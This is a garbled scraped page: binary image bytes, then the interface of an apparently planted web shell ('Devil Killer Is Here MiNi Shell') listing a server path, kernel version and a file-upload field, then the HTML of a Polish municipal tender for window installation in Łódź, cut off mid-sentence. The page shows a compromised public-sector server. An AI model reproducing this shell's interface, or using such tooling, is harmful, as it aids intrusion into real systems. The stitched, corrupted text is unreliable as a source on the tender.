JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250619/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250619/0028638001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Roboty budowlane w zakresie montażu stolarki okiennej na terenie nieruchomości położonej w Łodzi przy ul. Włókienniczej 1 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Łódzki Zakład Usług Komunalnych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 100124868</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowe Sady 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">94-102</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(+48) 42 27-23-450</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(+48) 42 27-23-451</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zaklad@lzuk.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.lzuk.lodz.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Roboty budowlane w zakresie montażu stolarki okiennej na terenie nieruchomości położonej w Łodzi przy ul. Włókienniczej 1 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9c9e89b6-b9b2-4198-8e31-c4efff5fed6d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00286380</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00680806/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 STOLARKA (PCV i drewniana) Włókiennicza 1</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-9c9e89b6-b9b2-4198-8e31-c4efff5fed6d <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”).<br/>Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie<br/>pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia.<br/>Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia<br/>wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/>Postępowanie prowadzone jest w języku polskim w formie elektronicznej, za pośrednictwem platformy e-Zamówienia –<br/>https://ezamowienia.gov.pl/. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia.<br/>We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem postępowania lub numerem ogłoszenia z BZP.<br/>Na platformie e-Zamówienia https://ezamowienia.gov.pl/założona jest odrębna strona przeznaczona dla niniejszego postępowania i<br/>w jej ramach udostępnione są dokumenty postępowania, narzędzia do komunikacji z Zamawiającym oraz narzędzia służące<br/>złożeniu/wycofaniu oferty. Informacje w szczególności dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu<br/>składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie e-Zamówienia, na stronie założonej dla postępowania.<br/>Korespondencja, której zgodnie z obowiązującymi przepisami, adresatem jest konkretny Wykonawca, będzie przekazywana w<br/>formie elektronicznej za pośrednictwem platformy https://ezamowienia.gov.pl/. do konkretnego Wykonawcy. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformie https://ezamowienia.gov.pl/ przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl. oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>Zamawiający dopuszcza, w wyjątkowych przypadkach, komunikację z Wykonawcami za pomocą poczty elektronicznej, e-mail:<br/>zaklad@lzuk.lodz.pl<br/>W przypadku załączników, które zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych winny być opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie<br/>zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym.<br/>W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 Ogólnego Rozporządzenia o Ochronie Danych Osobowych<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchyleniadyrektywy95/46/WE(Dz.Urz.UE<br/>L 119, s. 1) (dalej: RODO), Zamawiający informuje, że:<br/>2. Administratorem Pani/Pana danych osobowych jest Łódzki Zakład Usług Komunalnych w Łodzi, 94-102 Łódź, ul. Nowe Sady 19, email: zakład@lzuk.lodz.pl, tel.: +48 (42) 272 34 50, reprezentowany przez Dyrektora Łódzkiego Zakładu Usług Komunalnych w<br/>Łodzi zwanego dalej „Administratorem”.<br/>3. Administrator wyznaczył Inspektora ochrony danych osobowych, z którymi może się Pani/Pan skontaktować poprzez e-mail:<br/>iod@lzuk.lodz.pl lub zakład@lzuk.lodz.pl oraz listownie na adres podany powyżej. Z Inspektorem ochrony danych można się<br/>kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych przez Łódzki Zakład Usług Komunalnych w<br/>Łodzi oraz korzystania z praw związanych z przetwarzaniem danych.<br/>4. Podanie danych osobowych jest warunkiem koniecznym do realizacji postępowania o zamówienie publiczne w Łódzkim Zakładzie<br/>Usług Komunalnych w Łodzi; obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem określonym w przepisach ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t,j. Dz. U. z 2024r. poz. 1320)<br/>(dalej: Pzp), związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych<br/>danych wynikają z ustawy Pzp.<br/>5. Ogólną podstawę do przetwarzania danych stanowi art. 6 ust. 1 lit. b i c RODO, w celu prowadzenia przedmiotowego<br/>postępowania o udzielenie zamówienia publicznego, zawarcia umowy oraz rozliczeń finansowo-księgowych, a podstawą prawną ich<br/>przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywających na<br/>Zamawiającym.<br/>6. Szczegółowe cele przetwarzania danych zostały wskazane w następujących przepisach:<br/>- Ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych; (t,j. Dz. U. z 2024r. poz. 1320);<br/>- Ustawy z dnia 23 kwietnia 1964 r. Kodeks cywilny (t.j. Dz. U. z 2024r. poz. 1061);<br/>- Ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych (t.j. Dz. U. z 2024r. poz. 1530);<br/>- Ustawy z dnia 29 września 1994 r. o rachunkowości (t.j. Dz. U. z 2023 r. poz. 120).<br/>7. Dane osobowe mogą być udostępniane innym podmiotom, uprawnionym do ich otrzymania na podstawie obowiązujących<br/>przepisów prawa, tj. na podstawie art. 18 i art. 74 Pzp, a ponadto odbiorcom danych w rozumieniu przepisów o ochronie danych<br/>osobowych, w tym: podmiotom świadczącym usługi pocztowe, kurierskie, usługi informatyczne, bankowe, ubezpieczeniowe,<br/>osobom<br/>i podmiotom zainteresowanym prowadzonym postępowaniem o udzielenie zamówienia publicznego, a także podmiotom<br/>korzystającym z Biuletynu Informacji Publicznej, Biuletynu Zamówień Publicznych, Dziennika Urzędowego UE, systemu<br/>Ezamówienia, Bazy konkurencyjności oraz i z internetowej platformy zakupowej e-Katalogi, będącej w gestii Urzędu Zamówień<br/>Publicznych.<br/>W związku z przetwarzaniem danych osobowych, na podstawie przepisów prawa, posiada Pani/Pan prawo do:<br/>-dostępu do treści swoich danych (podstawa prawna: art. 15 RODO);<br/>-sprostowania lub uzupełnienia Pani/Pana danych osobowych;<br/>-żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO<br/>8. Ma Pani/Pan prawo wniesienia skargi do organu nadzorczego, tj. Prezesa Urzędu Ochrony Danych Osobowych ul. Stawki 2, 00-<br/>193 Warszawa, gdy uzna Pani/Pan, iż przetwarzanie danych osobowych narusza przepisy o ochronie danych osobowych.<br/>Dane nie będą przetwarzane w sposób zautomatyzowany, w tym również w formie profilowania.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu prawo do przenoszenia danych osobowych, ze względu na brak przesłanek określonych w art. 20 RODO, prawo wyrażenia sprzeciwu wobec przetwarzania danych osobowych (gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. b i c), a prawo usunięcia danych osobowych jest ograniczone tylko do tych danych które nie są konieczne do realizacji celów wskazanych w art. 17 ust. 3 lit. b, d, e RODO, tj. do wywiązania się z prawnego obowiązku wymagającego przetwarzania danych, do ustalenia, dochodzenia i obrony roszczeń oraz do celów archiwalnych. Ponadto, w szczególnych przypadkach prawa te mogą być ograniczone, ze względu np.: na wymogi prawne, m.in. zawarte w prawie podatkowym lub zasadach rachunkowości.<br/>Prawo do ograniczenia przetwarzania danych nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia.<br/>Skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników (podstawa prawna: art. 16 RODO)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">1.1.3/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Część I. Dostawa i montaż okien drewnianych dla budynku frontowego (A) remontowanej kamienicy, położonej w Łodzi przy ul. Włókienniczej 1.<br/>1) Przedmiotem zamówienia w ramach cz. I jest wykonanie, dostarczenie i zamontowanie w otworach przygotowanych przez Zamawiającego, bez obróbki tynkarskiej ościeży, stylizowanych okien drewnianych elewacji frontowej, drzwi balkonowych i okien klatki schodowej, wg rysunków:<br/>- 057-PW-A-Z01.A (VII2023)  - zestawienie okien<br/>- 057-PW-A-Z01.D (VII2023)  - zestawienie drzwi balkonowych<br/>- 057-PW-A-D12  (II.2024)      - detal okien OkD01, OkBD01, <br/>- 057-PW-A-D14 (II.2025)       - detal okien klatki schodowej  OkR01, OkR02, OkR03<br/>- 057-PW-A-Z01.F (VII2023    - detal okien klatki schodowej (do planowanej renowacji, z której zrezygnowano, na skutek ich złego stanu, należy więc okna wykonać jako nowe) zastąpiony w części rys 057-PW-A-D14.<br/>- 057-PW-A-D15 <br/>2) Dla elewacji frontowej:<br/>a) Okna w mieszkaniach i lokalach usługowych, drzwi balkonowe:<br/>- jednoramowe, profile z drewna klejonego, z ruchomym słupkiem, okapnikiem, fabrycznie malowane o wymaganiach:<br/>- kolor od zewnątrz NCS S 4550-Y90R/RAL 3011,<br/>- kolor od wewnątrz NCS S 0502-B50G/RAL 9003,<br/>- współczynnik przenikania ciepła U(max) = 0,9 W/(m2*K)<br/>- szklenie zestawem szybowym P3/bez wymagań, okucia obwiedniowe, <br/>- nawiewniki higrosterowalne ciśnieniowe we wskazanych oknach, zalecany montaż w górnych polach okien,<br/>- minimalne parametry akustyczne i opis szczegółowy wg danych w tabeli rysunku <br/>057-PW-A-Z01.A (VII.2023),<br/>- w oknach występuje ruchomy słupek, wg rysunku 057-PW-A-D12, (II.2024)<br/> oraz detal krzyża (ślemienia) wg schematu przedstawionego na rysunku <br/>057-PW-A-D15 (V.2025),<br/>- przed rozpoczęciem produkcji niezbędny jest pomiar z natury,<br/>- do oferty dołączyć należy rysunki warsztatowe.<br/>b) Okna klatki schodowej:<br/>- nowe, jednoramowe, profile z drewna klejonego, fabrycznie malowane obustronnie w kolorze NCS S 4550-Y90R/RAL 3011, wymiary i parametry dla okien nowych wg rysunku 0-57-PW-A-Z01.F oraz 057-PW-A-D14 (II.2025), tj.:<br/>- współczynnik przenikania ciepła U(max) = 1,4 W/(m2*K),<br/>- szklenie zestawem szybowym, okucia na wzór historycznych, (szprosy wiedeńskie) ,<br/>- przed rozpoczęciem produkcji konieczny jest pomiar z natury,<br/>- do oferty dołączyć należy rysunki warsztatowe.<br/>3) Zamawiający wstępnie przygotował otwory do zabudowy nowej stolarki, usuwając zabudowane okna, skuwając tynki, podwyższając i ujednolicając otwory w murze ceglanym.<br/>4) Termin rozpoczęcia montażu: 8 tygodni od dnia podpisania umowy.<br/>5) Przed rozpoczęciem produkcji Zamawiający zaleca pomiar z natury- niniejszy zapis nie ma charakteru wymagania dokonania wizji lokalnej przed złożeniem oferty, wykonanie pomiarów będzie jednak niezbędne przed rozpoczęciem produkcji okien. Wyceny należy dokonać na podstawie formularza cenowego stanowiącego załącznik do formularza ofertowego, w którym znajdują się faktyczne wykonane już pomiary z budowy. Wykonawca winien sporządzić ofertę na podstawie dokumentacji- w szczególności rysunków elewacji przedstawiających zakres i wielkość robót/budynków. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45421130-4 - Instalowanie drzwi i okien</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów w kryteriach.<br/>Uzyskana liczba punktów w ramach kryteriów zaokrąglona będzie do drugiego miejsca po przecinku. Jeżeli trzecia cyfra po<br/>przecinku (i/lub następne) jest mniejsza od 5 wynik zostanie zaokrąglony w dół, a jeżeli cyfra jest równa lub większa od 5 wynik<br/>zostanie zaokrąglony w górę.<br/>b) Przy ocenie ofert wartość wagowa wyrażona w procentach będzie wyrażona w punktach:<br/>(1 % = 1 pkt.)<br/>c) Punktacja przyznawana ofertom w kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku, przy<br/>wykorzystaniu matematycznych zasad zaokrąglania; najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>d) Zamawiający udzieli zamówienia temu(tym) Wykonawcy (Wykonawcom), którego(ych) oferta zostanie uznana za najkorzystniejszą, tj. uzyska największą łączną ilość punktów w kryteriach.<br/>e) Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawiają taki sam bilans ceny,<br/>Zamawiający:<br/>- spośród tych ofert wybiera ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>- jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną lub<br/>najniższym kosztem.<br/>f) Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa powyżej w pkt e) , Zamawiający wzywa Wykonawców, którzy<br/>złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę lub koszt,<br/>przy czym, Wykonawcy składający oferty dodatkowe nie mogą zaoferować cen lub kosztów wyższych niż zaoferowane w uprzednio złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II. Dostawa i montaż okien PCV dla budynku frontowego (A) i oficyny (B) remontowanych kamienic położonych w Łodzi, przy ul. Włókienniczej 1.<br/>1) Otwory przygotowane przez Zamawiającego, bez obróbki tynkarskiej ościeży.<br/>2) Dla budynku frontowego parametry i wymagania dla 